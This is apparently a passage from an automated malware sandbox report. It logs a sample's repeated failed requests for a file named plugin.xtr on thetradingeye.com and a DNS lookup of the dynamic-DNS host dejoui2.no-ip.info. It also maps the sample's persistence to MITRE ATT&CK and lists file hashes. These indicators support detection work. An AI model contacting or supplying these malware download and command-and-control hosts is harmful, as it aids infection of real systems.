Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:31:57 GMT
Content-Length: 19
-
Remote address:193.26.158.183:80RequestGET /plugin.xtr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: thetradingeye.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
X-Content-Type-Options: nosniff
Date: Sun, 08 Dec 2024 10:32:02 GMT
Content-Length: 19
-
Remote address:8.8.8.8:53Requestdejoui2.no-ip.infoIN AResponsedejoui2.no-ip.infoIN A0.0.0.0
-
12.0kB 6.2kB 59 32
HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404HTTP Request
GET http://thetradingeye.com/plugin.xtrHTTP Response
404
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Privilege Escalation
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
467KB
MD50715c843b7a3251e30b1032441b72a16
SHA18200877a5671f14accec609d62f5a481b8dec598
SHA25624db9327aa259fb2b7ce9bde4a56c1abc7ca545637b1b9bd117221943957a311
SHA512e681dbbcfd7516860deb685eb2d368f431aa2ecddd078e1350dd06b6d808cf15041e7307d1f5ea520770b0489fd6105979d2266f27adb7ad58cdde6ef832d271
-
Filesize
197KB
MD529e01606b4f35126333767f1fd7712fe
SHA125699a15402be8674f6a04592e51c3a1bffd2805
SHA25605129e5a49b13ec8e8f0098c927fbaf8b8b19a38e65aef20773d56f2c734833f
SHA512dfd3eca7cdfe7b97d12882e192ad85a57da938a5761a44d07aa85b386a0a4b20655c823341cb82b78585f1996ca3be9d8c7843e4a3fc9c132b1f56992ba1a405